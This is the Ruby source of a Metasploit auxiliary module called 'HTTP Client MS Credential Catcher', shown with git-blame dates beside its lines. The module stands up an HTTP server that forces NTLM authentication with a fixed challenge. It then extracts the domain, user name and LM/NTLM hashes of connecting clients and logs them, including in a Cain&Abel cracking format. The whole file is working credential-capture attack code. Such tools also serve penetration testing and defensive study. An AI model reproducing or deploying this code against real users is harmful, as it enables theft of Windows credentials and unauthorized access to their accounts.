2010-04-30 08:40:19 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2011-03-07 19:57:53 +00:00
|
|
|
require 'rex/proto/ntlm/constants'
|
2009-08-17 20:00:05 +00:00
|
|
|
|
2011-03-07 19:57:53 +00:00
|
|
|
NTLM_CONST = Rex::Proto::NTLM::Constants
|
|
|
|
|
|
|
|
require 'rex/proto/ntlm/message'
|
|
|
|
MESSAGE = Rex::Proto::NTLM::Message
|
2009-08-17 20:00:05 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
include Msf::Auxiliary::Report
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
def initialize(info = {})
|
2010-04-30 08:40:19 +00:00
|
|
|
super(update_info(info,
|
2009-08-17 20:00:05 +00:00
|
|
|
'Name' => 'HTTP Client MS Credential Catcher',
|
2010-12-12 19:06:18 +00:00
|
|
|
'Version' => '$Revision$',
|
2009-08-17 20:00:05 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module attempts to quietly catch NTLM/LM Challenge hashes.
|
|
|
|
},
|
2010-04-30 08:40:19 +00:00
|
|
|
'Author' =>
|
2009-08-17 20:00:05 +00:00
|
|
|
[
|
|
|
|
'Ryan Linn <sussurro[at]happypacket.net>',
|
|
|
|
],
|
2010-05-03 17:13:09 +00:00
|
|
|
'Version' => '$Revision$',
|
2009-08-17 20:00:05 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Actions' =>
|
|
|
|
[
|
2010-09-20 08:06:27 +00:00
|
|
|
[ 'WebServer' ]
|
2009-08-17 20:00:05 +00:00
|
|
|
],
|
2010-04-30 08:40:19 +00:00
|
|
|
'PassiveActions' =>
|
2009-08-17 20:00:05 +00:00
|
|
|
[
|
|
|
|
'WebServer'
|
|
|
|
],
|
|
|
|
'DefaultAction' => 'WebServer'))
|
|
|
|
|
|
|
|
register_options([
|
|
|
|
OptString.new('LOGFILE', [ false, "The local filename to store the captured hashes", nil ]),
|
2011-04-03 23:31:14 +00:00
|
|
|
OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ]),
|
|
|
|
OptString.new('CHALLENGE', [ true, "The 8 byte challenge ", "1122334455667788" ])
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
], self.class)
|
2010-05-03 17:13:09 +00:00
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
register_advanced_options([
|
|
|
|
OptString.new('DOMAIN', [ false, "The default domain to use for NTLM authentication", "DOMAIN"]),
|
|
|
|
OptString.new('SERVER', [ false, "The default server to use for NTLM authentication", "SERVER"]),
|
|
|
|
OptString.new('DNSNAME', [ false, "The default DNS server name to use for NTLM authentication", "SERVER"]),
|
|
|
|
OptString.new('DNSDOMAIN', [ false, "The default DNS domain name to use for NTLM authentication", "example.com"]),
|
|
|
|
OptBool.new('FORCEDEFAULT', [ false, "Force the default settings", false])
|
|
|
|
], self.class)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
2009-08-17 20:00:05 +00:00
|
|
|
print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
|
2011-01-13 20:57:33 +00:00
|
|
|
|
|
|
|
# If the host has not started auth, send 401 authenticate with only the NTLM option
|
|
|
|
if(!request.headers['Authorization'])
|
|
|
|
response = create_response(401, "Unauthorized")
|
|
|
|
response.headers['WWW-Authenticate'] = "NTLM"
|
|
|
|
cli.send_response(response)
|
|
|
|
else
|
|
|
|
method,hash = request.headers['Authorization'].split(/\s+/,2)
|
|
|
|
# If the method isn't NTLM something odd is goign on. Regardless, this won't get what we want, 404 them
|
|
|
|
if(method != "NTLM")
|
|
|
|
print_status("Unrecognized Authorization header, responding with 404")
|
2009-08-17 20:00:05 +00:00
|
|
|
send_not_found(cli)
|
|
|
|
return false
|
2011-01-13 20:57:33 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
response = handle_auth(cli,hash)
|
|
|
|
cli.send_response(response)
|
2009-08-17 20:00:05 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2011-04-03 23:31:14 +00:00
|
|
|
if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
|
|
|
|
@challenge = [ datastore['CHALLENGE'] ].pack("H*")
|
|
|
|
else
|
|
|
|
print_error("CHALLENGE syntax must match 1122334455667788")
|
|
|
|
return
|
|
|
|
end
|
2009-08-17 20:00:05 +00:00
|
|
|
exploit()
|
|
|
|
end
|
|
|
|
|
|
|
|
def handle_auth(cli,hash)
|
|
|
|
#authorization string is base64 encoded message
|
|
|
|
message = Rex::Text.decode_base64(hash)
|
|
|
|
|
2010-06-25 05:52:05 +00:00
|
|
|
if(message[8,1] == "\x01")
|
2009-08-17 20:00:05 +00:00
|
|
|
domain = datastore['DOMAIN']
|
|
|
|
server = datastore['SERVER']
|
|
|
|
dnsname = datastore['DNSNAME']
|
|
|
|
dnsdomain = datastore['DNSDOMAIN']
|
|
|
|
|
|
|
|
if(!datastore['FORCEDEFAULT'])
|
|
|
|
dom,ws = parse_type1_domain(message)
|
|
|
|
if(dom)
|
|
|
|
domain = dom
|
|
|
|
end
|
|
|
|
if(ws)
|
|
|
|
server = ws
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2010-06-25 05:52:05 +00:00
|
|
|
response = create_response(401, "Unauthorized")
|
2011-03-07 19:57:53 +00:00
|
|
|
chalhash = MESSAGE.process_type1_message(hash,@challenge,domain,server,dnsname,dnsdomain)
|
2009-08-17 20:00:05 +00:00
|
|
|
response.headers['WWW-Authenticate'] = "NTLM " + chalhash
|
|
|
|
return response
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
#if the message is a type 3 message, then we have our creds
|
2010-06-25 05:52:05 +00:00
|
|
|
elsif(message[8,1] == "\x03")
|
2011-03-07 19:57:53 +00:00
|
|
|
domain,user,host,lm_hash,ntlm_hash = MESSAGE.process_type3_message(hash)
|
2009-08-17 20:00:05 +00:00
|
|
|
print_status("#{cli.peerhost}: #{domain}\\#{user} #{lm_hash}:#{ntlm_hash} on #{host}")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
if(datastore['LOGFILE'])
|
2010-07-01 23:33:07 +00:00
|
|
|
fd = File.open(datastore['LOGFILE'], "ab")
|
2009-08-17 20:00:05 +00:00
|
|
|
fd.puts(
|
|
|
|
[
|
|
|
|
Time.now.to_s,
|
|
|
|
cli.peerhost,
|
|
|
|
host,
|
|
|
|
domain ? domain : "<NULL>",
|
|
|
|
user ? user : "<NULL>",
|
|
|
|
lm_hash ? lm_hash : "<NULL>",
|
|
|
|
ntlm_hash ? ntlm_hash : "<NULL>"
|
|
|
|
].join(":").gsub(/\n/, "\\n")
|
|
|
|
)
|
|
|
|
fd.close
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
if(datastore['PWFILE'] and user and lm_hash)
|
2010-07-01 23:33:07 +00:00
|
|
|
fd = File.open(datastore['PWFILE'], "ab+")
|
2009-08-17 20:00:05 +00:00
|
|
|
fd.puts(
|
|
|
|
[
|
|
|
|
user,
|
|
|
|
domain ? domain : "NULL",
|
|
|
|
@challenge.unpack("H*")[0],
|
|
|
|
lm_hash ? lm_hash : "0" * 32,
|
|
|
|
ntlm_hash ? ntlm_hash : "0" * 32
|
|
|
|
].join(":").gsub(/\n/, "\\n")
|
|
|
|
)
|
2010-04-30 08:40:19 +00:00
|
|
|
fd.close
|
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
end
|
|
|
|
response = create_response(200)
|
|
|
|
return response
|
|
|
|
else
|
|
|
|
response = create_response(200)
|
|
|
|
return response
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
def parse_type1_domain(message)
|
|
|
|
domain = nil
|
|
|
|
workstation = nil
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-06-25 05:52:05 +00:00
|
|
|
reqflags = message[12,4]
|
|
|
|
reqflags = reqflags.unpack("V").first
|
2009-08-17 20:00:05 +00:00
|
|
|
|
2011-03-07 19:57:53 +00:00
|
|
|
if((reqflags & NTLM_CONST::NEGOTIATE_DOMAIN) == NTLM_CONST::NEGOTIATE_DOMAIN)
|
2009-08-17 20:00:05 +00:00
|
|
|
dom_len = message[16,2].unpack('v')[0].to_i
|
|
|
|
dom_off = message[20,2].unpack('v')[0].to_i
|
|
|
|
domain = message[dom_off,dom_len].to_s
|
|
|
|
end
|
2011-03-07 19:57:53 +00:00
|
|
|
if((reqflags & NTLM_CONST::NEGOTIATE_WORKSTATION) == NTLM_CONST::NEGOTIATE_WORKSTATION)
|
2009-08-17 20:00:05 +00:00
|
|
|
wor_len = message[24,2].unpack('v')[0].to_i
|
|
|
|
wor_off = message[28,2].unpack('v')[0].to_i
|
|
|
|
workstation = message[wor_off,wor_len].to_s
|
|
|
|
end
|
|
|
|
return domain,workstation
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-08-17 20:00:05 +00:00
|
|
|
end
|